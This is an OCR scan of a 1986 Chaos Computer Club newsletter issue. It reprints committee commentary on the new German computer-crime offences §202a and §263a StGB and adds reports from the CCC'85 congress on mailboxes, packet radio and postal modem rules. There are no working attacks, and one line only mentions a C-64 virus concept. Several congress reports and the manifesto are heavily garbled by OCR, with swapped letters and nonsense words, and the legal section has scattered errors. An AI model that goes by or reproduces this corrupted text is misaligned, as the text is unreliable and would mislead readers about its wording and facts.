ten als dies beim gesprochenen Wort mit Hilfe 
von Spracherkennungsgeräten der Fall sei. 

b) Das geltende Recht gewährt Daten nur in 
Teilbereichen einen strafrechtlichen Schutz 
gegen Spionage. §41 Bundesdatenschutzge¬ 
setz bezieht sich nur auf personenbezogene 
Daten natürlicher Personen, §201 StGB auf 
die Aufnahme bzw. das Abhören des nichtöf- 
fenÜIch gesprochenen Wortes, wobei streitig 
ist, ob auch der Zugriff auf bereits gefertigte 
Aufnahmen erfaßt wird. § 202 Abs. 3 StGB 
zieht In den Schutzbereich des Tatbestandes 
der Verletzung des Briefgebeimnisses auch ei¬ 
nen „anderen zur Gedankenübermittlung be¬ 
stimmten Träger" mit ein. Damit werden un¬ 
streitig Fälle erfaßt, in denen z.B, in einem 
Tresor aufbewahrte Computerdaten auf ei¬ 
nem Magnetband nach Öffnung zur Kenntnis 
genommen werden. Da §202 Abs. 3 StGB auf 
den Schutz (ijuerter menschlicher Gedanken 
beschränkt, ist diese Regelung nicht anwend¬ 
bar, wenn Daten im ubermittlungsstadium 
abgefangen werden. 



s? 

I 


6 

'S 

3. 

s. 


o 

a 

o 

7 ! 


8 

S 


c) Die Lückenhaftigkeit des geltenden Rechts 
veranlaßt den Ausschuß, einen neuen Tatbe¬ 
stand vorzuschlagen, statt sich mit einer blo¬ 
ßen Ergänzung vorhandener Regelungen wie 
etwa die des §202 Abs. 3 StGB zu begnügen. 
Die Struktur des § 202 StGB bleibt dadurch 
unangetastet. Der Ausschuß legt allerdings 
Wert darauf, gespeicherte und im Übermitt¬ 
lungsstadium befindliche Daten gleich zu be¬ 
handeln. Die bisher durch §202 Abs. 3 i.V.m. 
Abs. 1, 2 StGB geschützten Daten fallen daher 
künftig unter den Schutzfaereich des neuen 
§202a StGB. 

Wegen des engen Zusammenhangs mit den 
§§ 201,202 StGB schlägt der Ausschuß vor. den 
Tatbestand in Anschluß an diese Regelungen 
in den Fünfzehnten Abschnitt des Strafgesetz¬ 
buches einzustellen, obwohl die Straftat nicht 
eine Verletzung des persönlichen Lebens¬ 
oder Geheimbereichs voraussetzt 

d) Der Ausschuß hat davon abgesehen, wie zu¬ 
nächst von der Bundesregierung angeregt 
schon den bloß unbefugten Zugang zu beson¬ 
ders gesicherten Daten und den Versuch einer 
Straftat nach § 202 a Abs. 1 StGB unter Strafe 
zu stellen. Der Gefahr einer Überkriminalisie¬ 
rung von Verhaltensweisen soll damit vorge¬ 
beugt werden. Das Strafrecht sollte erst dort 
eingreifen, wo ein Schaden oder wenigstens 
eine Rechtsgutsbeeinträchtigung, wie z.B. die 
Verletzung des Verfügungsrechts über Infor¬ 
mationen bei einer Tat nach § 202 a StGB, ein¬ 
getreten ist Insbesondere sollen sog. „Hak- 
ker", die sich mit dem bloßen Eindringen 
m^i'n Computersvstem begnügen, also sic h 
keine Daten unbefugt verschaffen, von Strafe 
verschont bleiben. Was die Versuchsstrafbar¬ 
keit betrifft, ist darauf zu verweisen, daß die¬ 
ser bisher in § 202 StGB und § 41 BDSG auch 
nicht mit Strafe bedroht ist Soweit es sich bei 
dem unbefugten Eindringen um ein Vorsta¬ 
dium zur Begehung von bestimmten Compu¬ 
terstraftaten, sei es nach §202a Abs. 1. nach 
§233, nach §269 oder nach §303a StGB han¬ 
delt bestehen aus allgemein strafrechtlichen 
Erwägungen Bedenken, Vorbereitungshand- 
lungen zu solchen Straftaten, die als Vergehen 
eingeshift werden, schon als solche mit Strafe 
zu bedrohen. Für eine Kriminalisierung ist 
zwar darauf hingewiesen worden, daß mit 
dem erfolgreichen Eindringen in fremde Da¬ 
tenbanken Integritätsinteressen von Betrei¬ 
bern und Benutzern gefährdet werden kön¬ 
nen und eine zu starke Systembelastung ein- 

treten kann. Insoweit stellt aber ein solches 
Verhalten erst eine Gefährdung dar. die für 
den Ausschuß als Ansatzpunkt für einen 
neuen Straftatbestand in diesem Bereich 
nicht ausreicht. Ist die eingetretene Störung 
durch das Eindringen so stark, daß Daten ver¬ 
ändert werden oder die Anlage beschädigt 
wird, so können u.U. die §§ 303 bis 303b StGB 
eingreifen. In Fällen, in denen der Täter sich 
nicht mit dem unbefugten Zugang begnügt, 
sondern darüber hinaus Daten abruft, bleibt 
§202a StGB anwendbar. 

Seite S 


2. Im einzelnen ist folgendes zu bemerken: 

Absatz I 

Strafbar macht sich, wer nicht für ihn bestimmte 
und gegen unberechtigten Zugang besonders ge¬ 
sicherte Daten i.S. des Absatzes 2 sich oder ei¬ 
nem anderen verschafft Geschützt werden damit 
nicht alle Daten vor Ausspähung, sondern nur 
diejenigen, die „besonders gesichert sind", d.h. 
solche, bei denen der Verfügungsberechtigte 
durch seine Sicherung sein Interesse an der „Ge¬ 
heimhaltung" dokumentiert Die geschützten Da¬ 
ten brauchen deswegen allerdings keine „Ge¬ 
heimnisse" I.S. der verschiedenen Straftatbe¬ 
stände zum Schutze von Geheimnissen darzu¬ 
stellen. Zur Auslegung des Begriffs „besonders 
gesichert“ kann auf die Regelung in § 202 Abs. 2 
StGB (vgl. auch §243 Abs, 1 Nr. 2 StGB) zurück¬ 
gegriffen werden. Zur Vermeidung etwaiger 
Strafbarkeitslücken setzt der Tatbestand, inso¬ 
fern weitergehend als § 202 StGB, nicht voraus, 
daß der Täter vom Inhalt der Daten Kenntnis 
nimmt (vgl. §96 StGB und die Neufassung von 
§ 1? Abs. 2 Nr. 1 UWG des Entwurfs: der Tatbe¬ 
stand läßt auch genügen, wenn der Täter einem 
anderen die Daten ver.schafft. Waren die be¬ 
schafften Daten für den Tater (zu seiner Kennt¬ 
nisnahme) bestimmt, so entfällt — wie bei § 202 
StGB — bereits die Tatbestandsmäßigkeit. Eine 
solche Bestimmung ist allerdings noch nicht 
darin zu sehen, daß der Abruf von z. B. entgeltlich 
zu erhaltenden Daten nach ordnungsgemäßem 
Anschluß an eine Datenbank allgemein möglich 
ist; der Anwendung des §202a StGB entgeht der 
Täter nicht, wenn er z.B. die Daten ohne einen 
solchen Anschluß unbefugt abruft Waren die ei¬ 
nem anderen verschafften Daten für diesen be¬ 
stimmt so kann die Strafbarkeit wegen mutma߬ 
licher Einwilligung entfallen. 

Die Tal ist nach § 205 Abs. l Antragsdelikt Diese 
Ausgestaltung stellt, neben der Anwendung der 
§§ 153. 153 B StPO. 47 JGG, einen wichtigen Filter 
zur Verhinderung von unnötigen Strafverfahren 
dar, z. B. wenn die Schuld gering ist und eine 
materielle Rechtsgutbeeinträchtigung nicht vor¬ 
liegt 

Absfltr 2 

Der Anwendungsbereich des Tatbestandes wird 
auf die in Absatz 2 genannten Daten beschränkt 
Das Ausspionieren von Daten ist vor allem dort 
gefährlich, wo Daten in großer Menge nicht sicht¬ 
bar, nicht lesbar oder sonst nicht unmittelbar 
wahrnehmbar gespeichert werden. Unmittelbar 
wahrnehmbare Daten sind u.a. durch die §§201. 
202 StGB ausreichend geschützt Zur Klarstel¬ 
lung wird die Einbeziehung von Daten, die über¬ 
mittelt werden, besonders hervorgehoben. Be¬ 
wußt hat der Ausschuß davon abgesehen, nur sol¬ 
che Daten zu schützen, die in eine Datenverar¬ 
beitungsanlage gespeichert in eine solche oder 
aus einer solchen übermittelt werden. Vom ge¬ 
schützten Rechtsgut her kann es keine Rolle 
spielen, welche Technologie bei der Speicherung 
und Übermittlung von Daten verwendet wird. 
Eine Notwendigkeit, den Datenbegriff näher zu 
bestimmen, hat der Ausschuß ebensowenig wie 
seinerzeit bei Einführung des § 266 (Absatz 2) 
StGB (vgl. den Ausschußbericht Drucksache 
IV/4094, S. 37 und die Auslegung in der Literatur) 
und des §2 Abs. 1 BDSG gesehen. Hervorzuhe¬ 
ben ist daß selbstverständlich auch gespeicherte 
Programme erfaßt werden. 


2)atcn§d)Icttbct 

15 = Marz 1986 

Wissenschaftliches Fachblatt für Datenreisende 
Herausgegeben vom Chaos Computer Club 


§ 202 Abs. 3 

Die Neufassung ist eine Folgeänderung zu dem 
Tatbestand des § 202 a StGB, der die bisher von 
§202 Abs. 3 i.V.m. Abs. 1, 2 geschützten Gedan- 
kenerklämngen in seinen Schutz auch einbe¬ 
zieht 


Zu Artikel 1 Nr. 2e — § 205 StGB — 

Der Ausschluß des Übergangs des Strafantrags ent¬ 
spricht der vergleichbaren Regelung ru §41 Abs. 1 
Nr. 2 BDSG (vgl. § 77 StGB). 


S 

S 


¥> 

P 

5 

a 


■g 

•c 


Zu Artikel 1 Nr. 3 — § 263 a StGB — 

Der Ausschuß hält den Vorschlag der Entwürfe, ei¬ 
nen gesonderten Tatbestand des „Computerbetru- 
ges" einzuführen für sachgerecht und hat ihn mit 
einigen nicht unwesentlichen Änderungen über¬ 
nommen. Auch wenn es in der Strafverfolgungspra¬ 
xis bisher nicht zu spektakulären Einstellungen 
oder Freisprüchen gekommen ist so ist der Aus¬ 
schuß aus den im Regierungsentwurf genannten 
Gründen von der Notwendigkeit, eine bestehende 
Strafrechtslücke zu schließen, überzeugt In diesem 
Punkte stimmen auch sämtliche Sachverständige 
bei der öffentlichen Anhörung überein (vgl. Prot 
Nr. 26 S. 164, 175f., 179. IBlf., 185f., IBS; Anl. S.35. 
41f., 150, 201, 218, 25Sf.). In Fortsetzung der grund¬ 
sätzlichen Linie der Strafrechtsreform, spezifische 
Mängel und Lücken klassischer Straftatbestände 
(§§263, 266, 267 StGB) nicht durch Änderung und 
Ergänzung dieser Tatbestände, sondern durch er¬ 
gänzende neue Tatbestände zu beheben, hat sich 
der Aus.schuß dafür entschieden, an der Einführung 
eines Sondertatbestandes festzuhalten. Er sieht 
sich damit in Übereinstimmung mit der Empfeh¬ 
lung der Sachverständigenkommission zur Be¬ 
kämpfung der Wirtschaflskriminalität und mit au.s- 
ländischen Regelungen (z. B. in Dänemark) und Re¬ 
formentwürfen (z.B. in Österreich und in der 

Schweiz). Dem Vorschlag von Haft und Sieber in 
der öffentlichen Anhörung (Prot S. 104, 169, 175 
Anl. S. 201, 205 f, 256 ff.), sich mit einer bloßen Er¬ 
gänzung des §263 StGB zu begnügen, ist der Aus¬ 
schuß nicht gefolgt Haft (Prot S. 164 ff„ Anl. 

S. 201 ff.) sieht ein Bedürfnis zur Ergänzung des 
§ 283 StGB nur hinsichtlich des „lrrtums*'-Merk- 
mals, weswegen er die Fassung der Entwürfe, die 
die Parallele zur Tathandlung, zum Irrtumsmerk- 
mal und zum ungeschriebenen Tatbestandselemenl 
der Vermögensverfügung beim Betrugstatbestand 
verlassen würden, ablehnt Er hat daher vorgeschla¬ 
gen, § 263 StGB nur um einen Satz zu ergänzen, der 
dem Irrtum I.S. des §263 die Fehlinformation des 
Computers gleichstellt Sieber (Prot S. 175 ff„ 
256 ff.) hat vorgeschlagen, den in § 263 StGB ge¬ 
nannten Tathandlungen die unrichtige oder fälsch¬ 
liche Beeinflussxmg eines automatischen Datenver¬ 
arbeitungsvorganges bzw. einer Datenverarbei¬ 
tungsanlage oder noch allgemeiner eines techni¬ 
schen Geräts, wenn das Datenverarbeitungssystem 
auch Kontrollrwecken dient bzw. bei dessen Ein¬ 
satz Kontrollen erfolgen, gleichzustellen. 

Seite 9 





Illustration by Paul Slater 













Der Ausschuß spricht sich dafür aus, die allgemeine 
Struktur des § 263 StGB im Rahmen dieses Geset¬ 
zes unangetastet zu lassen. Der Betrugstatbestand 
ist eine allgemeine Vorschrift zum Schutze des Ver¬ 
mögens gegen einen bestimmten Angriff, nämlich 
die dort genannten Täuschungshandlungen in Be¬ 
reicherungsabsicht Gegen andere Angriffe auf das 
Vermögen gibt es jeweils spezielle Vorschriften 
(vgl. als allgemeine Regelung z.B. §286 StGB). Der 
Computerbetrug stellt eine neue Manipulations¬ 
form zum Nachteil des Vermögens dar, die sich ge¬ 
rade dadurch auszeichnet daß ein Mensch nicht 
getäuscht und zu einer vermögensschädigenden 
Vermögensverfügung veranlaßt wird. Deswegen hat 
der Ausschuß auch von der Alternative abgesehen, 
den Computerbetrug in einem neuen Absatz 2 des 
§ 203 StGB zu erfassen. Computerbetrügereien wei¬ 
sen Besonderheiten auf, die einen eigenen Tatbe¬ 
stand auch mit einer vom Betrug teilweise abwei¬ 
chenden Ausgestaltung rechtfertigen. 

Gegen den Vorschlag von Haft hat der Ausschuß 
u. a. auch deswegen Bedenken, weil auch andere 
Merkmale des Betruges (^Vorspiegelung*'. „Erre¬ 
gen“ oder „Unterhalten“ eines Irrturps; ungeschrie¬ 
benes Merkmal der Vermögensverfügung) perso¬ 
nenbezogen zu verstehen sind und es daher nicht 
ausreicht, nur bei dem Merkmal des Irrtums eine 
Gleichstellung vorzunehmen. Der Vorschlag von 
Sieber ist im Hinblick auf seine noch zu unscharfe 
Fassung nicht bedenkenfrei. Seine Erwägung, einen 
Strafrechtsschutz nur gegen Manipulationen an si- 
cherheilskontrollierten Anlagen vorzusehen, würde 
den Tatbestand zu sehr einschränken. 

Durch Hervorhebung verschiedener Talmodalita- 
ten, die sich an empirischen Erscheinungsformen 
und an der Eigenart vermögonsschädigender Com¬ 
putermanipulationen orientieren, wird der Gefahr 
einer zu weilen Ausdehnung des Tatbestandes vor¬ 
gebeugt. 

Die ergänzte Fassung des Absatzes 1 hebt wie in 
den Entwürfen die Tathandlungen der besonders 
gefährlichen sog. fh-ogrammanipulation („unrich¬ 
tige Gestaltung des Programms“) und der Inputma- 
nlpulation („Verwendung unrichtiger oder unvoll¬ 
ständiger Daten“), welche die Programmanipula- 
tion an sich auch mitumfaßt (Programme sind eine 
besondere Art von Daten), besonders hervor. Von 
einer Verweisung auf den Datenbegriff des § 202 a 
Abs.2 StGB wurde abgesehen, da §263a StGB ge¬ 
rade auch Fälle erfaßt, in denen nicht an bereits 
gespeicherten Daten Manipulationen begangen, 
sondern diese erst eingegeben werden. 

Nachdem in der Wissenschaft und in der öffentli¬ 
chen Anhörung von mehreren Sachverständigen 
(Haft Oertel. Lehnhoff [Zentraler Kreditausschuß), 
Brentrup [Gesaratverband der Deutschen Versiche- 
rungswirtschaftj, Prot Nr. 26, S. 167, 101, 184 £f„ 188, 
Anl. S. 35,41 150.206.215 ff.) Zweifel geäußert wor¬ 

den waren, ob mit der Alternative der „unrichtigen 
Verwendung von Daten'* auch der Fall erfaßt wer¬ 
den kann, daß jemand z. B. unbefugt fremde Code 
nummern bei mißbräuchlichem Gebrauch eines 
Geldautomaten oder jemand unbefugt einen frem¬ 
den Anschluß an das Bildschirmtextsystem benutzt 
hat der Ausschuß eine ergänzende Klarstellung in¬ 
soweit für notwendig erachtet die auch vom Innen¬ 
ausschuß gebilligt wurde und einer Pmfungsanre- 
gung des Finanzausschusses entspricht Der in der 



S)otcn§rf|lcubcr 

15 = März 1986 

Wissenschaftliches Fachblatt für Datenreisende 
Herausgegeben vom Chaos Computer Club 


Wissenschaft umstrittene Ausweg, die §§ 242, 246 
StGB anzuwenden, den teilweise Instanzgerichte 
bei Mißbräuchen mit Bankomatkarten an Bargeld¬ 
automaten beschritten haben, steht bei einer mi߬ 
bräuchlichen Benutzung des Btx-Systems, die zu 
vermögensschädigenden Verfügungen führt nicht 
zu Verfügung. 

Von Sieber (Prot Nr. 26 Anl. S. 257) wurden Beden¬ 
ken geäußert die Fassung der Entwürfe könne 
eventuell dazu führen, daß neue Manipulationstech¬ 
niken (z.B. bestimmte Hardware-Manipulationen) 
nicht erfaßt würden. Der Ausschuß hat diese Be¬ 
denken aufgegriffen und den Tatbestand in Anleh¬ 
nung an den österreichischen Entwurf um die Al¬ 
ternative der „unbefugten Einwirkung auf den Ab¬ 
lauf* des zuvor genannten Datenverarbeitungsvor¬ 
gangs ergänzt Die in den Regierungsentwürfen er¬ 
faßte „Einwirkung“ auf den „Programmablauf" 
wurde dadurch, weil verallgemeinert, überflüssig. 
Wa.s die vom Täter mittels einer oder mehrerer Tal- 
modalitaten herbeigeführten und gewollten Folgen 
betrifft so hat sich im übrigen aufgrund der paralle¬ 
len Ausgestaltung zu § 263 StGB die Auslegung des 
§263a StGB zu des.-^en Eingrenzung an der Ausle¬ 
gung des § 263 StGB zu orientieren, wie dies näher 
im Regierungsentwurf ausgeführt ist Dadurch 
kann eine unnötige zu weile Anwendung des Tatbe¬ 
standes verhindert werden. 

Im Hinblick auf entsprechende Erörterungen im Fi¬ 
nanzausschuß wird noch darauf hingewiesen, daß 
soweit § 370 AO dem Betrugstatbesland vorgeht 
dies auch im Verhältnis zu § 263a StGB gilt 


I Absatz 2 wurde unverändert übernommen. 



Juristische Fochselten zur Datenschleuder 15 
Auf diesmal vier Seiten umfossende und aktuelle Information zu 
den neuen Computerkriminalitätsgesetzen. Auszüge aus Erlöu- 
ferungen und den Debatten sind mit freundlicher Genehmigung 
des Verlages Dr. Heger, PF 200821 , 53 Bonn 2, abgedruckf. 
Weitere rund 1000 Seiten zum Thema sind im Redoktionsarchiv 
zu finden. _ 

jurhokl 5.WS 860323 2025 Seite 10 


TATEN MIT DATEN 

Beiunt wird über Netzwerke leredeLte flmeriki 
werden rie benutzt Um über ihre Erfabrunien 
zu berichten, waren eifern einqe Teilnehmer dci 
imerikinlzcnen Netzwerke« "DelphiNer »nfe- 
reist 

Sie benuben das Nebwerk für On-Line- 
Konlerenten und ak ciektronitche Zeitunj. fln- 
wendunfsbeispieb Bei einer USfl-weilen flnti- 
ßpartbeiU-Demonilration fand man die akUieD- 
«len Infos im “ Delphin et". W ann wowie demon¬ 
striert wurde, konnte man überdas Netz abrufen. 
-On-ime-IConferenzen zwischen den lokalen 
Koordinatoren »rilen für aufeinander abfe- 
itimmte Aktionen. Nach Aussafen der Ameri¬ 
kaner lind Compuiei-Konferenzen fefenüber 
Telefon-Konferenzen 
a) hillker (csl ein Uierlel der Kosten) 
h)effe!ctiuer(l. uenucht nicht jeder dweh lautes 
BniOen das U ort an sich zu reißen, 2. kann man | 
nochmals nachlesen, was kurt zuvor fesaft wir-| 
de üst ja noch auf dem Schirm) 3. reden nicht 
alle durcheinander). Außerdem kann das 
Konferenz-Protokoll anschließend ausfedruckt 
und an Nicht-Teilnehmer uerteili werden, 
delphlwi 851228 D3:30e 



Hund SHmma scho 

Auch ln dititn Jihr uutift CCC Muf dun 
KKK von tüt B.H.P. hfs (= heimiesucht). Dw 
Beratunf Island für den lebensbejaJienden DFÜ- 
Benutzer war ein voller Erfolf. Nicht nur, daß 
die vereinifte Hackerschaft uns vntesvn alten 
Müll aus den Händen riss - nein, auch einen 
neuen Rekord fab es zu vermelden: NurH Tafe 
nach der Auslieleninf der B.H.P. Nr.£ erbHckie 
mit nur 6 Tafen TrafzeH die B.H.P. Nr.7 das 
LicblderU elL Dasterienmäßife Klonen erfolf- 
te dann mit dem Kopierer im (chaotischen) 
Archiv. UohlfemarkI, es bandelt sieb hierbei 
um KEINE Behelfs-oder Sonderausfabe, son¬ 
dern eine tanz normale B.H.P.. 

Am Stand wurden leilwelse heiß sakrale The¬ 
men, wie der Zusammenhanf zwischen redak- 
tfonelJem Weißbierkonsum und Erschetnums- 
weise der B.H.P. diskutiert, ak auch weltliche 
Dinfc, so das Dalen-Ver-und EntschHlsselunes- 
verfanren DES (Data Enci^ption Standard) der 
NHS (Halbnal Securltii Afcncy) besprochen. 
Im Zusammenhanf mit dam Immer aktuellen 


Dalenschvb war«« die SpekdxrHiif wo« 
BctteLke^ und AboneaUadaWn dar B.H.P. und 
Alternativen zum (kimputer, wie R ückfaD in db 
Karteikasteniiil (iminUrassaat) od«* «orWio- 
tete U mschläfe für jeden flhoimentzn (Beispiel 
Handbvch fir H ackW) Inhalt ke^ Diskvssio- 
nen. Wer eine Diskette dabei hatte, konnte sich 
im Hack-Center ileich die B.PLP.-f reeware ab- 
ziehen. Ein VlRUS-f roframmfl^onzepl für den 
C-64 entwickelt (hebe!!!) und die Zusammenar¬ 
beit zwischen B.H.P. und andaen Gruppen 
(CAC,Grs etc.) abf «prochan. 

bhp.us 851228 D5;a7e 


A.U.G.E. 

Am Samslaf 15.00 Uhr bnd ein Tr e ffen von 
Sus Op' s der lokalen MaiEboxen mnerhalb der 
Auge (Apple Ueer Group Europe) statt Ze- 
nächsl wurde der aktuelle Zastano beschrieben: 
eine zentrale Daiex-P MsülbaK binerhaib von 
IM CA (Geonet) und lokale Mailboxen in Frank¬ 
furt, Oberbausen, M annheim, Hamkwrf, Darni- 
stadl und Köln. 

In Zukunh soll ann ein Iniormitbnsaaitanseb 
iwischen allen lokalen Mailboxen itattfinden. 
Er wird sofort über einielne User der IMCA 
yerwrklicIrL Ein echtes Internailinf zoll später 
in Zusammenarbeil mtt anderen Boxen entste¬ 
hen. Die Koordinatian dieser Aktivitäten EiuH 
über die Rcfbnalfnippe Hatnburf. 
auf^ws äl228 Dfjl4e 


HPRCSSUM 
InformationshbU tum 
Chaos CommunikatiDn Conprest 
Pressestelle des CCC'S 
Druck: 

Eifendntck im Selbstverlai 
RedaktioTi: 

Medfenworkshop des CCC'SS 
Mltarh eilende Redaktionen: 

DaUnschteuder 
Die Bayrische Hackerpost 
GeneUiischer InformitiDntdienst 
C-64 Anwender Club 
u.a. 

U.LS.d.Pj 

Herwart HoOand-Morüz 
Schwenckestr.fß 
2D00 Hamburf 20 
Impress.wi 851226 4-.S6e 





—I Freiheit isi lernbar 

‘Coatpukr i* lic Ht*d lu Uolku“, das aai( 
1S7( aocli ab rtmluioBSrct- Satz. 198$ iil der 
HtiBcoaputtrauirkt k<l gcaälSsri 
Die einen Minen twar, wie de mit der Compu- 
fcrleclinik Hcrrtchah abtichem und erweiim 
Vönnen, andere dafteen empfinden erhabene 
Gefühle, wenn ex nach nonaUn felinyt,f1 uUert 
HauihalUkasxe auf dem C’64 zu Implementieren. 
Uber allem wabert ein irrealer Compulo-mpthoi 
' er umfibt nlhrt denjenifen, der nur vor|iht, 
etwai von ihr m «cnichen, mit der Aura det 
Erleuchte teil 

lildießnetl vor dem Computer ein Eriiehunyt- 
mütel für na^nfesellschzften? Abo, ‘wenn ihr 
nicht arti; leid, noU__euch dax froße tchwarze 
CamvulerunieheueH‘ 

Auf dem CCC'85 wurde deutlich, d^ die Uer- 
netzuni von Mikrocon^utem die rerxnektiue 
einer lokal autonomen GexeUxchaft durch kikal 
autonome Technik in ikh fanl Aber die Netze 
entstehen in den Köpfen der H enschen - sie sind 
ein W djenxakl - keine Fraie (echnbeher Reah- 
sierbarkeiL Ohne soziale Zuammenhiinj e, ohne 
femeinsame Inlerexsen und Ziele wird ein alter¬ 
natives Computemetz tum Btn dMenerieren. 
Untere Hebe brauchen ‘telUame , konsequent 
subfekUue imd poetische Inbirmatianen - ein 
spannender und menschlicher Kontrast zu bv- 
rokratitcken Oatenneben. 

Deutsche Hacker, Dichter, Denker. Jede phüo- 
nphbehe Schule bl teil dem Altertum auch 
immer eine Denkiormabervni fewesen. Unsere 
T ormalienjnien sind rein techniscW Natur. D ie 
Gedanken im Heb sind frei Freiheäist lernbar. 
Die Freiheit, db wir anbielen, bl die des Intor- 
maliontutries. Eine leidenschaftlich lestellte 
Frafi bt to Ubenswari wie eine verbindliche 
Antwort 

in diätem Sinne verstehen wir auch Schuluns- 
sproframme fürNehwerker NachbarschaftshU- 
fe im fiobalen Dorf statt Schult der Nation. 
Praktisch: der Anbieter eines Schuhinispro- 

J rammes weiß, d^ seine Schüler heute ssbon 
essere Lbtunien rinden können. 

Die Au^abe des Nebwerkers bt, sein Wissen 
und seine Technik anderen Nichl-Computer- 
Fachleufen weiter zu feben. Nur to laßt sich der 
(be-)herrxchende Compufermuthos auflosen. 
Niemand toQ seinen Computer küssen. Nebuer- 
ke sind menschlich, 
medbn.wt 8SI223 


1 







Luftige Da fe n mit Pocket Radio 

Standif umlaseri war die Funkmailbox DL 0 
CCC-1 auf dem CCC’85. M K 1200 Baud macht 
sie Datex im Luftverkehr. Die benutzte Norm 
bl AX25, die flmaleurfunkuertion von X.2S. 
M ii Ihr kann jeder Funkamaieur weltweit adres¬ 
siert werden. Beider Postnorm X.25 können die 
Datenpäckchen an höchstens 256 Empfänser 
adressiert werden. Uberlra|unjstehler wertlen 
wie bei Dalex X.25 erkannt. Auf 144i7S MHz 
war die luftise Box wäihrend des CCC'SS fast 
ztandiz in Betrieb. 

Emfcsebl werden au)^ “Pockercomputern 
mH anzMchlotsenem 7311-Modem und rlsnd- 
funkeetliche C64er mit wild anjebiuter Technik 
sowie die üblichen Sonderaufbauten. Ab Stan¬ 
dard exfctieren KompIelÜösunjjen für CPM- 
Kislen und C64er ab laufende rrolotypea Die 
Pbtinen werden jejenwirtij in Hamhurj enl- 
flochlen. Neben dem UK W -Bclrscb zibt cs auch 
weitreichende Dalenverbindunjen auf Kurzwel¬ 
le; oft in 300 Baud. 

Ein Besucher aus den USA stellte eine Dalen- 
funkverbindun; über Kurzwelle zwbchen USA 
und Nicarafua vors die Telefonverbindunfcn 
sind zu unzuverlässif. Is5 
packeÜ5.ws 851228 2209 



' Ebi Uideo über den Konzreß wrd vom Stadt- 
joumal erstellt und ist über 
stadtioumal hamburz rulschbahn 17 
' 2000 hamburs 13 

teL040A46279 für ca. 30.-zu bestellen. 

MailloxsofWare, die zu einem froßen Teil den 
IM CA/Geonel-Befebhsalz verwendet und in 
Turbo zeschrieben ist, ist zur Zeit im Apple- 
Format (35 o. 80 Track) erhalllich. 140 KB 
Sourcelext für 75.-. 

Infos unter 061517784158 von 01 -1 9 Uhr. 
schnipsc.Ms 8S122805:33e Seite 12 


MAILBOXEN SIND NICHT TOT¬ 
ZUKRIEGEN 

auch wenn die Posr es versucht 


An olle User, Hocker, Cracker und DFÜ-lr^leressierlen... Es 
geht um Eure Boxen und die neusten Akfivilöten der Deutschen 
ßundesPOST! War die Datenfernüberlrogung (DFD) noch bis 
vor kurzem das Privileg von Firmen, Wissenschoflern, Stoalsor- 
gonen und einer finanziell begüterten Minderheit, hot sich dies 
im Loüle der letzten Jahre dank stark gefollener Hord- und 
Softvi70re-Preise mit verbesserten Geräten und deren zuneh¬ 
mender Verbreitung stark geändert! Vor ca. 2 Jahren kamen bei 
uns elektronische Briefkösten für JEDERMANN — die ersten 
Mailboxen — ouf. Es werden ständig mehr. Zumeist war Enthu¬ 
siasmus und Liebe zum Hobby sowie die törichte Idee, Gebüh¬ 
ren zu sparen, der Anlaß, SysOp zu werden und so ein Medium 
ln die Dotenwelf zu stellen. . . Verdienen tut doron nur die Post: 
der Betreiber muß ständig investieren und die Anrufer vertele- 
fonieren. co. 2-3000 DM pro Monat. Do diese Mailboxen, wie 
unoufkvendig sie auch immer sind, Kosten verursochen und wir 
keine Millionöre sind, mußte der benötigte Rechner verbreitet, 
preiswert und flexibel sein — wie der Commodore C- 64 
(.. .oüch wenn einige onderer Meinung sind)! Desholb laufen in 
Oeufschlond etwa 90% der co. 200 privaten Boxen auf C-64 mit 
1541 Floppy. Nun kommt des 'Bonner Pudels Kern : Der 64.er 
besitzt zwar eine Funkstör-FTZ-Nummer, ober nur eine serielle 
TTL-SchnIttstelie. 


Im Laufe der Zeit drang die Kunde von einem sogenannten Mo¬ 
dem an die SysOp-Ohren. So ein Gerät ermöglichte neben dem 
Abnehmen eine wesentlich bessere DotensicherheitI Also, 
nichts einfacher als das — besorgen wir uns so ein Modem. 
Aber, oh Schreck, man gibt uns keins, denn unser Rechner hot 
doch keine FT2- Nummer (plötzlich braucht er die nämlich)!?! 
Ironie des Schicksals; die meisten F72-geprüflen Koppler arbei¬ 
ten auch mit RS232-PegeIn. Nun gibt es jo aber gottlob immer 
noch ein paar Stellen, die ähnliches ( manche behoupten sogar 
besseres) wie die POST onbiefen.. , Dos Zouberwori hiess DA- 
TENKLO. Das Dotenklo (oder ähnliches) konnte genau das wos 
ein POSTmodem auszeichnete — und noch ein bißchen mehr. 
Gesagt — gekauft — installiert. Von nun on kloppte dos mail- 
boxen In Stodt und Lord ganz gut und die POST konnte ständig 
wachsene Gebühreneinnahmen verbuchen. Alle waren zufrie¬ 
den — bisher!!! 

Dos scheint sich allerdings nun schlagartig zu öndern! Urplötz¬ 
lich sprengen diese Maiiboxen angeblich die POSTeigenen Ge- 
rotschoften offensichtlich reihenweise... 

Der C-64 muss sich zu einer Art SS-20 in der Dafentechnik ge¬ 
mausert haben und ein Dotenklo scheint es in seiner Wirkung 
mit Hiroshima aufzunehmen. Die Schäden im POSTolischen Ka¬ 
belwold müssen verheerend sein! 



Dos Btx-Moderr DBT03 poßt mit einer Vierdrohtverbindung on 
den C64. Erloubi ist dos ober erst noch der neuen TKO co. 1988. 
Die vormols kotserlich-joponiscKe Post hot den Sprung zu Tele* 
Icrotie schneller geschoft. Seit rund einem Johr dorf on joponi- 
sche Postdosen so ziemlich olles ongeschlossen werden. Houpl- 
soche, es geht nichts koputt. Hier wird es, wie unser Postminister 
ouf der lntermedio85 vortrug, noch Johre douern. Man holte 
gerode erst neue Untersuchungen in Auftrog gegeben. Solonge 
bemühe sich die Post um Flexibilität in der erworteten Richtung. 
Der juristisch korrekte Abstand zwischen DIN-Sfecker und der 
hoheitlichen Anschlußdose im ISDN-Formot (dos einzige, was 
von Bix bleibt) Ist deshalb in Jahren der Toleranz bis zur Frei¬ 
gabe zu bemessen. Solonge liegt der Stecker aus Sicherheits¬ 
gründen mohnend daneben. 

Viele der neuern Postmodems (nicht nur dos DBT03) hoben kei¬ 
ne ordnungsgemässe V24 (RS232-C) Schnittstelle. Damit erge¬ 
ben sich Unwägbarkeiten bei der POSTolischen Zulassung — 
der FTZ'Nummer. Dos ist diese toto! unumgängliche Prüfnum¬ 
mer für so hochtechnische Geräte wie z.B. eine Telefonsteckdo¬ 
se usw.. Ein FTZ-geprüfter Koppierdorf an eben diesem Rechner 
betrieben werden (Grund: der Rechner würde bei Fehlfunktion 
nur den Koppler, nicht ober das Welttelefonnetz zerstören) - 
man muss nur 24 Std. täglich neben seinem Rechner sitzen und 
